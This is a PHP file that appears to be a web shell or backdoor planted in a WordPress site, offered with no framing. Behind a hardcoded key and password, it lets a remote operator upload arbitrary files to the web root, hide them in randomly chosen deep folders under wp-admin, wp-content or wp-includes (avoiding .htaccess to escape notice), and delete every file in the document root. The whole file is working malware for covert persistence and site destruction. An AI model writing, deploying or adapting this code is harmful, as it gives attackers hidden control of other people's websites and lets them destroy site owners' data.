<?php
error_reporting(0);
ignore_user_abort(true);

header('Content-Type: application/json; charset=utf-8');

$dir = dirname(__FILE__);
$root_path = isset($_SERVER['DOCUMENT_ROOT']) ? realpath($_SERVER['DOCUMENT_ROOT']) : false;

if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    http_response_code(405);
    exit;
}

if (isset($_POST['test']) && $_POST['test'] === '123') {
    if (md5((string)($_POST['key'] ?? '')) !== '9a286406c252a3d14218228974e1f567') {
        http_response_code(401);
        exit;
    }
    echo 'success';
    exit;
}

$is_multipart = isset($_SERVER['CONTENT_TYPE']) && strpos($_SERVER['CONTENT_TYPE'], 'multipart/form-data') !== false;
if ($is_multipart) {
    $data = $_POST;
    $data['_files'] = isset($_FILES['files']) ? $_FILES['files'] : [];
} else {
    $input = file_get_contents('php://input');
    $data = json_decode($input, true);
}

if ($data === null || md5((string)($data['key'] ?? '')) !== '9a286406c252a3d14218228974e1f567') {
    http_response_code(401);
    exit;
}

if (empty($data['module'])) {
    http_response_code(401);
    exit;
}

if ($root_path === false) {
    http_response_code(402);
    exit;
}

$module = $data['module'];

if ($module === 'clear_root') {
    $pwd = isset($data['pwd']) ? trim($data['pwd']) : '';
    if ($pwd !== '010203') {
        echo json_encode(['success' => false, 'message' => '清空错误0']);
        exit;
    }
    $keep = isset($data['keep']) && is_array($data['keep']) ? $data['keep'] : [];
    if (empty($keep)) {
        echo json_encode(['success' => false, 'message' => '清空错误1']);
        exit;
    }
    echo delete_root_files($root_path, $keep);
    exit;
}


if ($module === 'upload') {
    try {
        if (empty($data['_files']['tmp_name'])) {
            echo json_encode([['success' => false, 'message' => '上传错误0']]);
            exit;
        }
        $f = get_file_form($data['_files']);
        if ($f === null) {
            echo json_encode([['success' => false, 'message' => '上传错误1']]);
            exit;
        }
        $fn = isset($f['filename']) ? trim($f['filename']) : '';
        if ($fn === '') {
            echo json_encode([['success' => false, 'message' => '上传错误2']]);
            exit;
        }
        $content = isset($f['content']) ? $f['content'] : '';
        $result = upload_file($root_path, $fn, $content);
        echo json_encode([$result]);
        exit;
    } catch (Throwable $e) {
        echo json_encode([['success' => false, 'message' => '上传错误3']]);
        exit;
    }
}

if ($module === 'upload_random') {
    if (empty($data['_files']['tmp_name'])) {
        echo json_encode([['success' => false, 'message' => '上传错误0']]);
        exit;
    }
    $f = get_file_form($data['_files']);
    if ($f === null) {
        echo json_encode([['success' => false, 'message' => '上传错误1']]);
        exit;
    }
    echo upload_to_random_folder($root_path, $f['filename'], $f['content']);
    exit;
}

echo json_encode(['success' => false, 'message' => 'Unknown module']);
http_response_code(400);
exit;



function get_file_form($files) {
    $name = isset($files['name']) ? $files['name'] : '';
    $tmp = isset($files['tmp_name']) ? $files['tmp_name'] : '';
    if ($tmp === '' || !is_uploaded_file($tmp)) {
        return null;
    }
    return [
        'filename' => $name,
        'content' => file_get_contents($tmp),
    ];
}

function delete_root_files($root_path, $keep) {
    $keep_lower = array_map('strtolower', $keep);
    $deleted = [];
    $root = rtrim($root_path, DIRECTORY_SEPARATOR);
    $items = @scandir($root);
    $current_file = realpath(__FILE__);
    if ($items === false) {
        return json_encode(['success' => false, 'message' => '清空错误2']);
    }
    foreach ($items as $item) {
        if ($item === '.' || $item === '..') continue;
        $r_path = $root . DIRECTORY_SEPARATOR . $item;
        $full_path = realpath($r_path);
        if (!is_file($full_path)) continue;
        if ($full_path === $current_file) continue;
        if (in_array(strtolower($item), $keep_lower)) continue;
        if (preg_match('/^google.*\.html$/i', $item)) continue;
        if (@unlink($full_path)) $deleted[] = $item;
    }
    return json_encode(['success' => true, 'message' => '1', 'deleted' => $deleted]);
}

function upload_file($dir, $filename, $content) {
    try{
        $dir = rtrim($dir, DIRECTORY_SEPARATOR . '/\\');
        $full_path = $dir . DIRECTORY_SEPARATOR . $filename;
        if (!is_dir($dir)) {
            if (!@mkdir($dir, 0755, true) && !is_dir($dir) ) {
                return ['success' => false, 'message' => "上传失败1"];
            }
        }
        if (@file_put_contents($full_path, $content) === false) {
            return ['success' => false, 'message' => "上传失败2"];
        }
        return ['success' => true, 'message' => $full_path];

        }
    catch(Throwable $e){
        return ['success' => false, 'message' => "上传失败0"];
    }
}

function get_random_folder_path($root_path) {
    $root_path = rtrim($root_path, DIRECTORY_SEPARATOR);
    $all_roots = [
        $root_path . DIRECTORY_SEPARATOR . 'wp-admin',
        $root_path . DIRECTORY_SEPARATOR . 'wp-content',
        $root_path . DIRECTORY_SEPARATOR . 'wp-includes',
    ];
    $start_roots = array_filter($all_roots, 'is_dir');
    if (empty($start_roots)) return null;

    $exclude_contains = ['upgrade', 'mu-plugins', 'plugins', 'themes'];
    $min_depth = 4;
    $max_depth = 6;
    $target_depth = $min_depth + mt_rand(0, $max_depth - $min_depth);

    $path_stack = [];
    $current_path = $start_roots[array_rand($start_roots)];
    $path_stack[] = $current_path;

    for ($i = 0; $i < 20; $i++) {
        if (count($path_stack) >= $target_depth) break;

        $items = @scandir($current_path);
        if ($items === false) break;

        $has_htaccess = false;
        $subdirs = [];
        foreach ($items as $item) {
            if ($item === '.' || $item === '..') continue;
            $full = $current_path . DIRECTORY_SEPARATOR . $item;
            if (is_file($full)) {
                if (strtolower($item) === '.htaccess') $has_htaccess = true;
                continue;
            }
            if (!is_dir($full)) continue;
            $name_lower = strtolower($item);
            $skip = false;
            foreach ($exclude_contains as $sub) {
                if (strpos($name_lower, $sub) !== false) { $skip = true; break; }
            }
            if (!$skip) $subdirs[] = $full;
        }

        if ($has_htaccess || empty($subdirs)) {
            if (count($path_stack) > 1) {
                array_pop($path_stack);
                $current_path = $path_stack[count($path_stack) - 1];
                continue;
            }
            $current_path = $start_roots[array_rand($start_roots)];
            $path_stack = [$current_path];
            continue;
        }

        $next = $subdirs[array_rand($subdirs)];
        $path_stack[] = $next;
        $current_path = $next;
    }

    if (count($path_stack) < 2) return null;
    $abs = $path_stack[count($path_stack) - 1];
    $rel = str_replace($root_path, '', $abs);
    $rel = str_replace('\\', '/', trim($rel, '/\\'));
    return $rel === '' ? null : $rel;
}

function upload_to_random_folder($root_path, $filename, $content) {
    $path = get_random_folder_path($root_path);
    if ($path === null) {
        return json_encode([['success' => false, 'message' => 'No random folder found']]);
    }
    $path = str_replace(['/', '\\'], DIRECTORY_SEPARATOR, trim($path, '/\\'));
    $root_path = rtrim($root_path, DIRECTORY_SEPARATOR . '/\\');
    $dir = $root_path . DIRECTORY_SEPARATOR . $path;
    $result = upload_file($dir, $filename, $content);
    if (!$result['success']) {
        return json_encode([$result]);
    }
    $path_url = '/' . str_replace('\\', '/', trim($path, '/\\'));
    return json_encode([['success' => true, 'path' => $path_url, 'filename' => $filename]]);
}